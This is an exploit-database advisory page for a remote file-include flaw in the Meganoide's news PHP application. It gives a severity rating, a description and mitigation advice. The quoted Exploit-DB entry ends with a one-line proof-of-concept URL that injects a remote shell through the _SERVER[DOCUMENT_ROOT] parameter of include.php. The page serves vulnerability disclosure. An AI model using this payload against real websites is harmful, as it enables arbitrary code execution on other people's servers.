header-logo
Suggest Exploit
vendor:
Meganoide's news
by:
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Meganoide's news
Affected Version From: 1.1.2001
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Remote File Include Vulnerability in Meganoide’s news

The Meganoide's news application is vulnerable to a remote file-include vulnerability due to inadequate sanitization of user-supplied input. An attacker can exploit this vulnerability to execute arbitrary PHP code within the context of the webserver process.

Mitigation:

To mitigate this vulnerability, the developer should ensure that user-supplied input is properly sanitized and validated before including files. Additionally, it is recommended to implement strong input validation and apply the principle of least privilege when handling user input.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/22589/info

Meganoide's news is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit this issue to execute arbitrary PHP code in the context of the webserver process.

This issue affects version 1.1.1; other versions may also be affected. 

http://www.example.com/path/include.php?_SERVER[DOCUMENT_ROOT]=[shell]